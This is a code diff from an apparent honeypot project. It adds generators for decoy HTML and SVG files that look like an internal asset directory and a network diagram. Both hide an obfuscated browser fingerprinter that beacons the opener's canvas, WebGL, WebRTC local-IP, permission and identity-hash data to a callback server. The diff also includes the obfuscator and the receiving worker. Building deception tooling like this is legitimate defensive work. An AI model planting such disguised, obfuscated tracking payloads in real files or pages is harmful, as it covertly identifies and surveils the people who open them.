for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
samples.push(performance.now() - pa);
}
samples.sort(function (a, b) { return a - b; });
fp.pf = {
med: samples[500].toFixed(4),
p95: samples[950].toFixed(4),
mn: samples[0].toFixed(4),
mx: samples[999].toFixed(4),
};
} catch (e) { fp.pf = { err: String(e) }; }
// permissions
try {
if (navigator.permissions) {
var names = ["geolocation", "notifications", "camera", "microphone",
"persistent-storage", "clipboard-read", "clipboard-write"];
var st = {};
for (var ni = 0; ni < names.length; ni++) {
try {
var r = await navigator.permissions.query({ name: names[ni] });
st[names[ni]] = r.state;
} catch (e) { st[names[ni]] = "unsupported"; }
}
fp.pm = st;
} else { fp.pm = { err: "unavailable" }; }
} catch (e) { fp.pm = { err: String(e) }; }
// composite identity hash — stable inputs only
try {
var stable = [
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
fp.scr && (fp.scr.w + "x" + fp.scr.h),
].filter(Boolean).join("|");
fp.id = await sha256(stable);
} catch (e) { fp.id = { err: String(e) }; }
// 2) ship the payload as base64url JSON on a GET query param.
// The current worker records the hit on /c/<slug>; step-4 worker
// will decode ?d= and persist the fingerprint blob.
try {
var json = JSON.stringify(fp);
var b64 = btoa(unescape(encodeURIComponent(json)))
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
// chunk if URL would exceed safe limit (~6KB)
var MAX = 6000;
if (b64.length <= MAX) {
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
} else {
var sid = (Math.random() * 1e9 | 0).toString(36);
var total = Math.ceil(b64.length / MAX);
for (var ci = 0; ci < total; ci++) {
var part = b64.substr(ci * MAX, MAX);
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
}
}
} catch (e) { /* swallow */ }
})();

View File

@@ -0,0 +1,140 @@
"""HTML fingerprint canary — plausible-looking page with an obfuscated
browser-fingerprinting payload inlined at the bottom of ``<body>``.
The visible content is a deliberately mundane "internal directory"
table — the kind of file a curious attacker pulls off a decky's
filesystem and opens locally to triage. When the file is opened in
*any* network-connected browser the obfuscated payload runs and beacons
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
timing jitter, permissions, composite identity hash).
Determinism: the mint UUID is derived from the callback token via
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
output, satisfying the generator contract in :mod:`decnet.canary.base`.
The obfuscator's seed and polymorphic config bits are likewise
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
"""
from __future__ import annotations
import hashlib
import uuid
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
def _mint_uuid_for(callback_token: str) -> str:
return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
def _stable_int(callback_token: str, salt: str = "") -> int:
"""Deterministic non-negative int derived from the callback token.
``builtins.hash`` is salted per-process — useless for a generator
that must be byte-identical across runs. SHA-256 prefix is
overkill but free.
"""
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
return int.from_bytes(h[:4], "big")
_PAGE_TEMPLATE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Internal Asset Directory</title>
<style>
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
margin:24px;font-size:13px}}
h1{{font-size:18px;margin:0 0 4px 0}}
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
table{{border-collapse:collapse;width:100%;background:#fff;
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
th{{background:#f4f4f4;font-weight:600;font-size:11px;
text-transform:uppercase;letter-spacing:.5px;color:#555}}
tr:hover td{{background:#fafbff}}
.foot{{margin-top:16px;color:#999;font-size:11px}}
</style>
</head>
<body>
<h1>Internal Asset Directory</h1>
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
<table>
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
{rows}
</table>
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
<script>{payload}</script>
</body>
</html>
"""
_ROW_POOL = (
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
)
def _build_rows(callback_token: str) -> tuple[str, int]:
pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
take = 5 + (_stable_int(callback_token, "take") % 4)
selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
cells = "\n".join(
"<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
for row in selected
)
return cells, len(selected)
def _sync_label(callback_token: str) -> str:
day = _stable_int(callback_token, "day") % 28 + 1
hour = _stable_int(callback_token, "hour") % 24
return f"2026-04-{day:02d} {hour:02d}:14 UTC"
class FingerprintHtmlGenerator(CanaryGenerator):
"""Synthesise an HTML page that fingerprints the browser opening it."""
name = "fingerprint_html"
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
mint_uuid = _mint_uuid_for(ctx.callback_token)
nonce = nonce_for(ctx.callback_token, mint_uuid)
payload = render_fingerprint_js(
callback_token=ctx.callback_token,
http_base=ctx.http_base,
mint_uuid=mint_uuid,
nonce=nonce,
)
rows, row_count = _build_rows(ctx.callback_token)
body = _PAGE_TEMPLATE.format(
sync_label=_sync_label(ctx.callback_token),
row_count=row_count,
rows=rows,
payload=payload,
)
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
return CanaryArtifact(
path="",
content=body.encode("utf-8"),
mode=0o644,
mtime_offset=-86400 * 14,
generator=self.name,
fingerprint_nonce=nonce,
notes=[
f"obfuscated fingerprinter beacons={beacon}",
f"mint_uuid={mint_uuid}",
],
)

View File

@@ -0,0 +1,88 @@
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
that runs the obfuscated fingerprinter when the file is opened directly
in a browser.
SVG ``<script>`` only fires when the SVG is loaded as a top-level
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
SVG is referenced from another page's ``<img>``. That's the right
posture for canary use: an attacker browsing the decky filesystem and
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
inside a sandboxed CMS preview does not.
Same determinism guarantees as :mod:`fingerprint_html`.
"""
from __future__ import annotations
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
<style>
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
</style>
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
<path class="edge" d="M160 105 L240 105"/>
<path class="edge" d="M360 105 L440 105"/>
<path class="edge" d="M300 130 L300 220"/>
<script type="application/ecmascript"><![CDATA[
{payload}
]]></script>
</svg>
"""
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
class FingerprintSvgGenerator(CanaryGenerator):
"""Synthesise an SVG that fingerprints the browser opening it."""
name = "fingerprint_svg"
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
mint_uuid = _mint_uuid_for(ctx.callback_token)
nonce = nonce_for(ctx.callback_token, mint_uuid)
payload = render_fingerprint_js(
callback_token=ctx.callback_token,
http_base=ctx.http_base,
mint_uuid=mint_uuid,
nonce=nonce,
)
region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
day = _stable_int(ctx.callback_token, "day") % 28 + 1
body = _DIAGRAM_TEMPLATE.format(
region=region,
ver=ver,
review=f"2026-03-{day:02d}",
payload=payload,
)
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
return CanaryArtifact(
path="",
content=body.encode("utf-8"),
mode=0o644,
mtime_offset=-86400 * 30,
generator=self.name,
fingerprint_nonce=nonce,
notes=[
f"obfuscated fingerprinter beacons={beacon}",
f"mint_uuid={mint_uuid}",
],
)

177
decnet/canary/obfuscator.py Normal file
View File

@@ -0,0 +1,177 @@
"""Per-mint JS obfuscator wrapper.
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
Used by the fingerprint generators / instrumenters to produce a unique,
hard-to-statically-analyse JS blob per canary mint.
Two design choices flow from the canary contract in :mod:`base`:
* **Determinism.** Generators must return byte-identical artifacts for
the same ``(callback_token, http_base, dns_zone, persona)``. We
derive a numeric seed from the callback token and pass it to the
obfuscator's own ``seed`` option, and we derive the polymorphic
config bits from the same hash so a re-mint reproduces exactly.
* **Per-mint uniqueness.** Two different callback tokens produce
structurally different output: different identifier names, different
string-array rotation, optionally different transforms enabled.
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
We pass code+options as JSON on stdin and read the obfuscated result
from stdout. Stderr surfaces obfuscator failures.
"""
from __future__ import annotations
import hashlib
import hmac
import json
import os
import subprocess # nosec B404 — Node helper exec is the whole point
from pathlib import Path
from typing import Any
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
# specific runtime; default to PATH lookup.
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
# Hard timeout for the obfuscator subprocess. Real runs on the
# fingerprint payload sit well under 5s on a dev box.
_TIMEOUT_S = 30
class ObfuscatorError(RuntimeError):
"""Raised when the Node helper fails or returns empty output."""
class FingerprintSecretMissing(RuntimeError):
"""Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
Fingerprint canaries embed a per-mint nonce derived from this
server-side secret; without it the worker cannot validate incoming
fingerprint beacons, so we fail loud at mint time rather than ship
a defeatable canary.
"""
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
def nonce_for(callback_token: str, mint_uuid: str) -> str:
"""Compute the per-mint fingerprint nonce.
HMAC-SHA256 keyed on the server-side master secret, message is
``callback_token + "|" + mint_uuid``. Truncated to 16 hex chars
(~64 bits of entropy) — enough to defeat slug-only forgery while
fitting comfortably into a query string.
"""
secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
if not secret:
raise FingerprintSecretMissing(
f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
)
msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
def _seed_from_token(callback_token: str) -> int:
"""Derive a 31-bit numeric seed from the callback token.
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
using a SHA-256-derived prefix gives us a uniform distribution
across the 31-bit positive range.
"""
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
def _config_from_seed(seed: int) -> dict[str, Any]:
"""Build a deterministic, per-mint obfuscator config.
The hash bits drive *which* transforms apply — two mints get
structurally different outputs, not just different identifier names.
Defaults stay aggressive enough that reverse engineering is real
work; we never disable string-array or rename, only vary the dial.
"""
bits = seed
encodings = ("base64", "rc4")
string_array_encoding = [encodings[bits & 1]]
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
transform_object_keys = bool((bits >> 17) & 1)
numbers_to_expressions = bool((bits >> 18) & 1)
simplify = bool((bits >> 19) & 1)
return {
"compact": True,
"seed": seed,
"controlFlowFlattening": True,
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
"deadCodeInjection": True,
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
"stringArray": True,
"stringArrayEncoding": string_array_encoding,
"stringArrayThreshold": 1,
"stringArrayRotate": True,
"stringArrayShuffle": True,
"splitStrings": True,
"splitStringsChunkLength": 4 + (bits & 7),
"transformObjectKeys": transform_object_keys,
"numbersToExpressions": numbers_to_expressions,
"simplify": simplify,
"selfDefending": False, # breaks SVG embed; not worth the cost
"renameGlobals": False,
"identifierNamesGenerator": "mangled-shuffled",
}
def obfuscate(code: str, *, callback_token: str) -> str:
"""Obfuscate *code* deterministically per *callback_token*.
Raises :class:`ObfuscatorError` if Node fails or returns empty.
"""
seed = _seed_from_token(callback_token)
options = _config_from_seed(seed)
payload = json.dumps({"code": code, "options": options})
try:
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
[_NODE_BIN, str(_HELPER)],
input=payload, capture_output=True, text=True,
timeout=_TIMEOUT_S, check=False,
)
except FileNotFoundError as e:
raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
except subprocess.TimeoutExpired as e:
raise ObfuscatorError("javascript-obfuscator timed out") from e
if proc.returncode != 0:
raise ObfuscatorError(
f"javascript-obfuscator failed rc={proc.returncode} "
f"stderr={proc.stderr.strip()[:400]}"
)
out = proc.stdout
if not out.strip():
raise ObfuscatorError("javascript-obfuscator returned empty output")
return out
def render_fingerprint_js(
*, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
) -> str:
"""Build the obfuscated fingerprint JS for a single mint.
Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
``{{MINT_NONCE}}`` in the payload template, then runs it through
:func:`obfuscate` with a seed derived from the callback token.
The nonce is appended as ``&k=`` on every beacon URL the JS emits;
the worker rejects fingerprint payloads whose ``?k=`` doesn't match
the row's :attr:`CanaryToken.fingerprint_nonce`.
"""
template = _PAYLOAD.read_text(encoding="utf-8")
beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
src = (
template
.replace("{{BEACON_URL}}", beacon)
.replace("{{MINT_UUID}}", mint_uuid)
.replace("{{MINT_NONCE}}", nonce)
)
return obfuscate(src, callback_token=callback_token)

View File

@@ -0,0 +1,10 @@
{
"name": "decnet-canary-obfuscator",
"version": "0.1.0",
"private": true,
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
"main": "_obfuscate_helper.js",
"dependencies": {
"javascript-obfuscator": "^5.4.2"
}
}

View File

@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
}
_WINDOWS_DEFAULTS: dict[str, str] = {
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
}

View File

@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
"""
from __future__ import annotations
import asyncio
import base64
import os
import shlex
import time
from datetime import datetime, timedelta, timezone
from secrets import token_urlsafe
from typing import Any, Iterable, Optional
@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
from decnet.canary.base import CanaryArtifact, CanaryContext
from decnet.canary.factory import get_generator
from decnet.canary.paths import default_path_for
from decnet.decky_io import (
delete_file_from_container,
resolve_topology_container,
write_file_to_container,
)
from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository
log = get_logger("canary.planter")
_DOCKER = "docker"
_TIMEOUT = 8.0
# Container suffix — matches the orchestrator SSH driver's convention
# (``<decky_name>-ssh``). Canary placement always happens through the
# ssh container because every decky has one and it carries the most
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
def _dirname(path: str) -> str:
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]
async def _run(
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
) -> tuple[int, str, str]:
try:
proc = await asyncio.create_subprocess_exec(
*argv,
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except FileNotFoundError as exc:
return 127, "", f"argv[0] not found: {exc}"
try:
stdout, stderr = await asyncio.wait_for(
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
)
except asyncio.TimeoutError:
try:
proc.kill()
except ProcessLookupError:
pass
return 124, "", "timeout"
return (
proc.returncode if proc.returncode is not None else -1,
stdout.decode("utf-8", "replace"),
stderr.decode("utf-8", "replace"),
)
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
"""Compose the ``sh -c`` script + stdin payload for one artifact.
Binary safety: we base64-encode on the host and stream the result
over stdin to ``base64 -d`` inside the container, so the bytes
never touch the argv (kernel ARG_MAX would reject anything larger
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
and ``touch -d @<unix_ts>`` are present on every Linux base image
we ship, so there's no per-distro branching.
"""
encoded = base64.b64encode(artifact.content)
mtime = int(time.time() + artifact.mtime_offset)
mode_str = oct(artifact.mode)[2:]
parts = [
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
f"base64 -d > {shlex.quote(artifact.path)}",
f"chmod {mode_str} {shlex.quote(artifact.path)}",
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
]
return " && ".join(parts), encoded
# resolve_topology_container is re-exported from decky_io for back-compat
# with callers (tests, deploy hook) that imported it from this module
# before the decky_io extraction.
__all__ = [
"plant",
"revoke",
"resolve_topology_container",
"seed_baseline",
"seed_baseline_topology",
]
async def _publish(
@@ -139,6 +93,7 @@ async def plant(
repo: Optional[BaseRepository] = None,
publish: bool = True,
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]:
"""Write *artifact* into the decky's ssh container.
@@ -157,13 +112,12 @@ async def plant(
await repo.update_canary_token_state(token_uuid, "failed", err)
return False, err
sh_cmd, stdin_payload = _build_plant_command(artifact)
# ``-i`` keeps stdin attached so base64 -d inside the container can
# consume the encoded payload streamed from the host.
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
success = rc == 0
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
target_container = container or _container_for(decky_name)
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
success, error = await write_file_to_container(
target_container, artifact.path, artifact.content,
mode=artifact.mode, mtime=mtime,
)
if repo is not None:
if success:
@@ -182,8 +136,8 @@ async def plant(
if not success:
log.warning(
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
decky_name, token_uuid, rc, stderr[:120],
"canary.plant failed decky=%s token=%s container=%s err=%r",
decky_name, token_uuid, target_container, error,
)
return success, error
@@ -196,6 +150,7 @@ async def revoke(
repo: Optional[BaseRepository] = None,
publish: bool = True,
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]:
"""Best-effort unlink + state transition + bus publish.
@@ -203,11 +158,10 @@ async def revoke(
the file is gone after the call (whether we deleted it or it was
already missing); only docker / container-down errors return False.
"""
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv)
success = rc == 0
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
target_container = container or _container_for(decky_name)
success, error = await delete_file_from_container(
target_container, placement_path,
)
if repo is not None:
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
@@ -250,6 +204,7 @@ async def seed_baseline(
persona: str = "linux",
created_by: str = "system",
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> list[dict[str, Any]]:
"""Plant the configured baseline canary set on one decky.
@@ -293,9 +248,59 @@ async def seed_baseline(
await plant(
decky_name, artifact,
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
container=container,
)
out.append({
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
"callback_token": slug, "placement_path": artifact.path,
})
return out
async def seed_baseline_topology(
repo: BaseRepository,
topology_id: str,
*,
created_by: str = "system",
bus: Optional[BaseBus] = None,
) -> list[dict[str, Any]]:
"""Plant baseline canaries on every decky in a MazeNET topology.
Mirrors :func:`seed_baseline` for the topology path. Container name
resolution uses :func:`resolve_topology_container` since topology
deckies may not have an ssh service — in that case we target the
base container instead.
Best-effort: failures on any single decky are logged inside
:func:`plant`; the deploy hook treats the return value as
informational. Returns a flat list of per-token dicts (with an added
``decky_name`` key) across all deckies.
"""
from decnet.topology.persistence import hydrate
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
log.warning(
"canary.seed_baseline_topology: topology %s not found", topology_id,
)
return []
out: list[dict[str, Any]] = []
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
services = decky.get("services") or []
container = resolve_topology_container(topology_id, decky_name, services)
# MazeNET deckies don't carry an OS persona today; default to
# linux (every base image we ship is Linux).
rows = await seed_baseline(
decky_name, repo,
persona="linux", created_by=created_by, bus=bus,
container=container,
)
for r in rows:
r["decky_name"] = decky_name
out.append(r)
return out

View File

@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
from __future__ import annotations
import asyncio
import base64
import binascii
import json
import os
import time
import uuid
from datetime import datetime, timezone
from typing import Optional
from typing import Any, Optional
from fastapi import FastAPI, Request, Response
@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
)
# Namespace used by fingerprint generators to derive mint UUID.
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
# Not shared across worker restarts or processes — acceptable for MVP.
_FP_RATE_WINDOW_S = 60
_FP_RATE_LIMIT = 30
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
key = (token_uuid, src_ip)
now = time.monotonic()
cutoff = now - _FP_RATE_WINDOW_S
bucket = _fp_rate_buckets.get(key, [])
bucket = [t for t in bucket if t > cutoff]
if len(bucket) >= _FP_RATE_LIMIT:
_fp_rate_buckets[key] = bucket
return False
bucket.append(now)
_fp_rate_buckets[key] = bucket
return True
def _is_valid_fp_shape(fp: dict) -> bool:
"""Layer B — structural sanity check on a decoded fingerprint blob."""
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
return False
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
return present >= 3
def _http_base() -> str:
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
@app.get("/c/{slug}")
async def callback(slug: str, request: Request) -> Response:
raw_nonce = request.query_params.get("k")
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
merged_headers = dict(request.headers)
if fp_meta:
merged_headers.update(fp_meta)
await _record_hit(
repo, bus,
slug=slug,
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
user_agent=request.headers.get("user-agent"),
request_path=str(request.url.path),
dns_qname=None,
raw_headers=dict(request.headers),
raw_headers=merged_headers,
parsed_fp=parsed_fp,
raw_nonce=raw_nonce,
)
# Always 200 with a tiny image so the attacker's client sees
# a "success" — same return regardless of whether the slug is
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
return app
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
# overflow is handled via chunking (s/i/n + d). Anything larger than
# this on a single request is junk, so we drop it instead of letting an
# attacker inflate a trigger row indefinitely.
_FP_CHUNK_MAX = 8 * 1024
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
Returns a tuple of:
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
when there's no ``?d=`` or decoding fails.
"""
out: dict[str, Any] = {}
parsed_fp: Optional[dict] = None
if not qp:
return out, parsed_fp
o = qp.get("o") if hasattr(qp, "get") else None
if o:
out["_fp_open"] = "1"
d = qp.get("d") if hasattr(qp, "get") else None
if not d:
return out, parsed_fp
if len(d) > _FP_CHUNK_MAX:
out["_fp_oversize"] = "1"
return out, parsed_fp
sid = qp.get("s")
idx = qp.get("i")
total = qp.get("n")
if sid and idx and total:
out["_fp_sid"] = sid
out["_fp_idx"] = idx
out["_fp_total"] = total
out["_fp_chunk"] = d
return out, parsed_fp
# Single-shot: decode and pass back as parsed_fp; validation runs in
# _record_hit after token lookup so we have the stored nonce at hand.
try:
padded = d + "=" * (-len(d) % 4)
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
parsed = json.loads(raw.decode("utf-8"))
except (binascii.Error, ValueError, UnicodeDecodeError):
out["_fp_decode_error"] = "1"
return out, parsed_fp
if isinstance(parsed, dict):
parsed_fp = parsed
else:
out["_fp_decode_error"] = "1"
return out, parsed_fp
def _client_ip(request: Request) -> str:
# Honor X-Forwarded-For if the operator deployed behind a reverse
# proxy. Take the leftmost address in the chain; everything after
@@ -154,16 +262,58 @@ async def _record_hit(
request_path: Optional[str],
dns_qname: Optional[str],
raw_headers: Optional[dict],
parsed_fp: Optional[dict] = None,
raw_nonce: Optional[str] = None,
) -> None:
"""Resolve slug -> token, persist a trigger, publish on the bus.
Unknown slugs are silently swallowed: returning the same response
for known and unknown slugs is the stealth posture, and persisting
every random scan would clutter the DB.
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
it is validated through four layers before being merged into raw_headers:
A) nonce match against CanaryToken.fingerprint_nonce,
B) structural shape check,
C) mint UUID consistency,
D) per-(token, IP) rate limit.
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
The trigger row always lands regardless — the GET hit is itself forensic.
"""
token = await repo.get_canary_token_by_slug(slug)
if token is None:
return
final_headers: dict[str, Any] = dict(raw_headers or {})
if parsed_fp is not None:
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
# Layer A — nonce
if stored_nonce is not None and raw_nonce != stored_nonce:
final_headers["_fp_invalid_nonce"] = "1"
parsed_fp = None
# Layer B — shape (only when nonce passed or no nonce enforced)
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
final_headers["_fp_invalid_shape"] = "1"
parsed_fp = None
# Layer C — mint UUID consistency
if parsed_fp is not None:
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
if parsed_fp.get("mint") != expected_mint:
final_headers["_fp_invalid_mint"] = "1"
parsed_fp = None
# Layer D — rate limit
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
final_headers["_fp_rate_limited"] = "1"
parsed_fp = None
if parsed_fp is not None:
final_headers["_fp"] = parsed_fp
trigger_id = await repo.record_canary_trigger({
"token_uuid": token["uuid"],
